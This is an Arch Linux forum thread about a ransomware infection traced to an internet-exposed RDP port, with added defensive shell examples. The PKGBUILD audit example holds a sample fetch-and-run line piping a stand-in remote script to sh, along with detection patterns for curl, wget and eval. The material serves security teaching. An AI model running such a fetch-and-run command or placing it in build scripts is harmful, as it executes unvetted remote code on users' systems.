Hello, today I wanted to access one of my PCs while away. I installed Remmina on my Arch Linux machine; it required FreeRDP to use remote desktop, so I installed that, all using yay. I also installed wireguird from the link on the AUR site. All that was during lunch time. At the end of the day my remote PC had been infected with ransomware. It's a company computer. No other computer on the network has been infected. Could it be related to anything from Arch? It was only after accessing it through Arch that this happened. I had a remote desktop port that I opened on the days I use it. I had a few passwords stored in my Chrome profile; should I consider those compromised?
Last edited by zalves2000 (2024-07-11 23:32:34)
What is "ransomware" and what are the symptoms of the infection?
after accessing it through Arch
I guess that, along with the subject line, implies there are other means to access it, i.e. a parallel Windows, and that's probably also what's infected?
Also installed wireguird from the link in the AUR site.
You did what?
https://archlinux.org/packages/extra/x8 … ard-tools/
The AUR is unvetted, it's possible to pick up malware from there but if your windows is infected with ransomware™ it's *abysmally* more likely that you got that using windows.
A compromised system is generally not trustworthy, and unless your passwords are stored encrypted and you didn't decrypt the vault after the malware entered the system, you have to consider them compromised, because you don't know that they're not.
Edit: please list all the AUR packages you installed
Last edited by seth (2024-07-11 06:43:42)
At 2pm I had to remote login. So I installed Remmina using yay -S remmina. After that I noticed I had to install FreeRDP. So I did that using git clone for this: https://aur.archlinux.org/packages/freerdp-git. When I tried to makepkg it said it needed dependencies, so I did makepkg -s. That was it.
I also installed wireguard-tools using yay, and git clone for https://aur.archlinux.org/packages/wireguird as per Arch wiki instructions.
Did I do anything wrong?
I noticed around 10pm that it was hacked. The PC was powered on and not used for a week; only after accessing it remotely did it get "kidnapped". The data in it is not of much concern, but if it spreads to other machines on the network it's very bad! It was powered off immediately.
You've completely failed to detail the "hacked by ransomware" part. Is Windows affected? Did you notice that the first time using Windows after a week?
I'm sorry to chip in with little value here Seth, but I just have to ask @zalves2000 why you seem to go straight to the AUR when there is a perfectly functional package in the main repos (extra)?
All the packages you've mentioned are in the main repos. Aside from that, as Seth said, other than our own interpretation of what we know ransomware to be, we don't know anything about your symptoms or setup to be able to answer your questions.
If the computer was turned off, how do you know the virus / malware was not already there and booting it up simply ran the malware's startup scripts? When you noticed it vs. when it was infected are two different things.
Ryzen 7 9850X3D | AMD 7800XT | KDE Plasma
My Windows installation has been working fine for the past week that it has been untouched. Only after accessing it through the described methods did it become affected by ransomware. As soon as I noticed a ransomware attack on the Windows machine I turned it off immediately, to help prevent propagation to the rest of the network. WireGuard doesn't appear to be the culprit, as it was the RDP that had abnormally high traffic. It's just a lot of coincidence that a system which is unaffected for a very long time becomes infected shortly after being accessed via my Linux installation.
It's unlikely there is ransomware baked into FreeRDP or Remmina; they're used by a lot of people to access Windows systems new and old. That's not to say there isn't, though, especially through the AUR; it's just unlikely.
We still have no idea what your ransomware looks like, can you describe it to us? What exactly are you wanting us to help you with?
If you're asking for recommendations on what software you should have used, I'd just say don't use yay, use pacman. Install remmina and dependencies from the main repos and enjoy. If you're asking if your Linux system is compromised, we have no way of knowing at present.
Ryzen 7 9850X3D | AMD 7800XT | KDE Plasma
On phone, so short: wireguird is not a typo, it's a GUI for WireGuard management. Just to clear up some confusion, maybe.
A WAN-exposed RDP port is a huge risk. There is one critical vulnerability every year and a medium to high one every other month. Even if your system has been patched, the risk is just too high. Your scenario is inconclusive. Did you open an RDP port, or did you use a WireGuard tunnel?
If you suspect whatever infection you're not detailing to come from your Arch system, at least list all AUR (and otherwise foreign) packages you're using.
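One way to act on seth's point above (RDP reachable only through the WireGuard tunnel, never from the WAN), as an added example that is not from the thread: two nftables rulesets for a Linux gateway in front of the workstation, the weak one beside the corrected one, plus a small check that flags the exposed variant. Interface names, the workstation address and the WireGuard port are constructed assumptions, and only the filter table is shown (any NAT rules are omitted).

```shell
#!/bin/sh
# Added example, not from the thread: two nftables rulesets for a Linux
# gateway in front of the Windows workstation, plus a check that flags the
# one exposing RDP. Interface names, the workstation address and the
# WireGuard port are constructed assumptions.
WAN_IF=eth0; WG_IF=wg0; WG_PORT=51820; RDP_HOST=192.168.1.20

# Weak setup from the thread: TCP 3389 forwarded straight from the WAN,
# so anyone on the internet can try credentials against the workstation.
wan_rdp_ruleset() {
  cat <<EOF
table inet filter {
  chain forward {
    type filter hook forward priority 0; policy drop;
    ct state established,related accept
    iifname "$WAN_IF" ip daddr $RDP_HOST tcp dport 3389 accept
  }
}
EOF
}

# Corrected setup: the WAN only sees WireGuard's UDP port; RDP is forwarded
# solely for packets that arrive through the tunnel interface.
wg_only_rdp_ruleset() {
  cat <<EOF
table inet filter {
  chain input {
    type filter hook input priority 0; policy drop;
    ct state established,related accept
    iifname "lo" accept
    iifname "$WAN_IF" udp dport $WG_PORT accept
  }
  chain forward {
    type filter hook forward priority 0; policy drop;
    ct state established,related accept
    iifname "$WG_IF" ip daddr $RDP_HOST tcp dport 3389 accept
  }
}
EOF
}

# True (exit 0) if the ruleset accepts TCP 3389 on any interface other than
# the WireGuard one, i.e. RDP is reachable without the tunnel.
rdp_exposed() {
  printf '%s\n' "$1" | grep 'tcp dport 3389 accept' | grep -qv "iifname \"$WG_IF\""
}

# Review both; load the corrected one on the gateway with: wg_only_rdp_ruleset | nft -f -
for gen in wan_rdp_ruleset wg_only_rdp_ruleset; do
  if rdp_exposed "$($gen)"; then echo "$gen: RDP exposed"; else echo "$gen: tunnel-only"; fi
done
```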
Ransomware encrypts all your files, and a pop-up appears everywhere saying you have to pay a certain amount of bitcoin to get the keys for decryption. It's nasty!
I was sorting out ways to access my computer on the other side. Firstly RDP and secondly a WireGuard VPN.
It's true the RDP port was open, but how easy is it to access without proper credentials? Those were given when accessing yesterday; could there be someone just listening on the port and intercepting packets to get credentials?
From the AUR I installed: freerdp, wireguird and wireguard-tools. For freerdp I used -s with makepkg to get the missing dependencies. That was it.
Any way I can get a list of what was installed?
I'm not blaming Arch, but it seems that the AUR isn't some place where everything can be trusted. When I use it I try to go for things that have higher popularity and are commonly used, but it appears I should always try pacman first.
"pacman -Qm" shows all foreign packages that do not come from a repository. You should also list all non-standard repositories you're using from pacman.conf.
It's true the RDP port was open, but how easy is it to access without proper credentials?
A WAN facing RDP port is game over, there's no malware in any AUR packages necessary. The attack is super-common.
https://www.syspeace.com/ransomware-attacks-via-rdp/
https://ransomware.org/blog/rdp-ransomw … d-to-know/
We can still look at the list, but that's like saying it was maybe the Jewish space lasers that blinded you while, purely coincidentally, you were poking your eyes with a red hot iron…
From these links it appears it may have been the case. Malware might have been there waiting for an opening.
It's true the RDP port was open, but how easy is it to access without proper credentials?
A WAN facing RDP port is game over, there's no malware in any AUR packages necessary. The attack is super-common.
https://www.syspeace.com/ransomware-attacks-via-rdp/
https://ransomware.org/blog/rdp-ransomw … d-to-know/
Now I suppose it's damage control in terms of stopping it spreading to the rest of the network, and compromised credentials. None of the contents is sensitive information. It's been a few hours and nothing else has changed. I did change passwords of important accounts and enabled 2FA on some that didn't have it.
Thank you for your replies. Let's hope there is no further damage.
Anyway here is the list of dependencies:
airspyhf-git r124.39f06a4-1
airspyhf-git-debug r124.39f06a4-1
arduino-ide-bin 2.3.2-2
autojump 22.5.3-9
brave-bin 1:1.67.123-1
dxvk-bin 2.3.1-1
esp-idf 5.2.2-1
freerdp-git 3.6.3.r17.g3838b18b5-1
github-desktop-bin 3.3.18_linux1-1
google-chrome 126.0.6478.126-1
libsdrplay 3.15.2-2
libsdrplay-debug 3.15.2-2
nordic-darker-standard-buttons-theme 2.2.0-1
nordic-darker-theme 2.2.0-1
nordic-kde-git 2.2.0.r112.g564f54c-1
nordic-theme 2.2.0-1
ocs-url 3.1.0-7
parsec-bin 150_86e-6
plymouth-git 24.004.60.r48.g3ce6441a-1
rtl-sdr-blog-git 1:v1.3.6.r0.g240bd0e-1
sddm-nordic-theme-git 2.2.0.r111.g8f7bcdb-1
sdrpp-git 1.0.4.r712.36492e79-1
sdrpp-git-debug 1.0.4.r712.36492e79-1
snapper-gui-git 0.1+8.r132.20220626.1915750-1
ttf-meslo 1.2.1-3
wireguird 1.1.0-1
wireguird-debug 1.1.0-1
yay 12.3.5-1
yay-debug 12.3.5-1
zoom 6.1.0-1
When I had a web server with Digital Ocean I ran fail2ban on it, which banned IPs that failed to connect. Over the course of a few years nobody ever got in, but I had hundreds of connection attempts every single day from people trying to break into my server, which hosted nothing of any interest to anyone.
People / bots are indeed constantly probing for weakness.
Ryzen 7 9850X3D | AMD 7800XT | KDE Plasma
Lesson learned: never again a port open for RDP. Policy will be changed. Praying that no further damage comes to be. Can I trust my Arch installation, or should I do a fresh install?
Can I trust my Arch installation, should I do a fresh install?
The question might be better posed, "Can I trust *anything* (especially Windows) on my computer?"
UNIX was not designed to stop you from doing stupid things, because that would also stop you from doing clever things. -- Doug Gwyn
Is Arch on the system that got compromised by the ransomware, or did you use some Arch Linux system to access a different system (which ultimately got infected) via RDP?
A compromised system is principally not trustworthy. If the ransomware just encrypted the Windows partitions w/ BitLocker and apparently ignored the Linux installation, there's a good chance it didn't even "see" them, but the problem is *you don't know*.
It could even have manipulated the ESP.
I used a different Arch Linux system, on my laptop, to access a different system, a Windows workstation (that got infected) in a different location. I haven't been to the office yet to see exactly what happened. When I logged in remotely I saw the ransomware warning and immediately shut down the Windows workstation. All drives will be formatted once I get there. No other system has been affected on the network of the Windows machine, so far. I've received a few e-mails during the day from Facebook with the code for a password reset. That is what has happened so far. All ports are closed on the router.
What realistically has happened is that you opened RDP to the WAN, the system got taken over by the ransomware through that, and by your own account *before* your remote RDP access attempt.
Your Linux installation has never been part of that equation, except that you randomly used it when learning about the condition of the Windows system, and therefore there's no reason to assume that the Arch system is compromised in any way, shape or form.
(There are reverse RDP attacks, and that's how a bunch of these assholes got owned when attacking the wrong system, but that level of sophistication is unlikely to be expected from some ransomware that was likely clicked together.)
I did connect to it around 2pm and it was fine; only later that day, around 20pm when I logged in again, did the infection manifest itself. That is what I found to be strange. The port had been open for a few days before that without problems. Anyway, no more RDP open to the outside. A reverse RDP attack would be something I'd be happy to do to those assholes, but as you say, if I can be a victim, I'm also very far off from being able to pull it off, and would probably be a victim of something in the process. I really love Arch since I gave it a try. I wanted a Linux distro for my old MacBook laptop for ham radio and some microcontroller projects. When you're learning, mistakes are made; some can be expensive. The internet is a jungle...
Another thing you hopefully learned is to be careful w/ the AUR.
https://aur.archlinux.org/cgit/aur.git/ … reerdp-git looks legit and is maintained by a very active AUR user, but keep in mind that the AUR is unvetted, so limit its usage to the necessary and pay attention to the builds. It's an assistance for you to build things, not an extended repository.
One of the biggest issues w/ pacman-wrapping AUR helpers like yay is that they blur those lines.
Please always remember to mark resolved threads by editing your initial posts subject - so others will know that there's no task left, but maybe a solution to find.
Thanks.
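To make "pay attention to the builds" concrete, as an added example that is not from the thread or from any AUR package: a small POSIX shell scan of a PKGBUILD (the file makepkg runs, after `pacman -Qm` has told you which foreign packages you have) that flags the things a reviewer should read before building. The patterns and the sample PKGBUILD are constructed heuristics, not a malware detector.

```shell
#!/bin/sh
# Added example, not from the thread or from any AUR package: a quick
# red-flag scan to run on a PKGBUILD before makepkg. The patterns are
# heuristics for what a reviewer should read closely, not a malware scanner.
# Usage: audit_pkgbuild PKGBUILD   (or feed the file on stdin)
# Prints one line per finding; the return value is the number of findings.
audit_pkgbuild() {
  pb=$(cat "${1:-/dev/stdin}"); n=0
  # 'SKIP' checksum on a plain download: nothing verifies what makepkg fetched.
  # (SKIP is normal for git+/hg+/svn+ sources, which are pinned by commit.)
  if printf '%s\n' "$pb" | grep -Eq "sums=\([^)]*'SKIP'" &&
     ! printf '%s\n' "$pb" | grep -Eq "source=.*(git|hg|svn)\+"; then
    echo "checksum 'SKIP' on a non-VCS source"; n=$((n+1))
  fi
  # http:// download URL: the tarball can be swapped on the wire.
  if printf '%s\n' "$pb" | grep -Eq "source=.*['\"]http://"; then
    echo "plain http:// source URL"; n=$((n+1))
  fi
  # Fetch-and-run or decode-and-run inside build functions bypasses source=/sums.
  body=$(printf '%s\n' "$pb" | sed -n '/^[a-z_]*() *{/,/^}/p')
  for pat in 'curl ' 'wget ' 'base64 -d' 'eval ' 'sudo ' 'chmod .*+s'; do
    if printf '%s\n' "$body" | grep -q "$pat"; then
      echo "'$pat' inside a build function"; n=$((n+1))
    fi
  done
  return "$n"
}

# Constructed sample (not a real AUR package); expected: three findings.
SUSPECT_PKGBUILD=$(cat <<'EOF'
pkgname=example-tool
pkgver=1.0
source=("http://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
package() {
  curl -s https://example.invalid/post-install.sh | sh
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
}
EOF
)

# Audit the file named on the command line, or the constructed sample.
{ if [ $# -gt 0 ]; then audit_pkgbuild "$1"; else printf '%s\n' "$SUSPECT_PKGBUILD" | audit_pkgbuild; fi; } ||
  echo "$? finding(s): read this PKGBUILD before running makepkg"
```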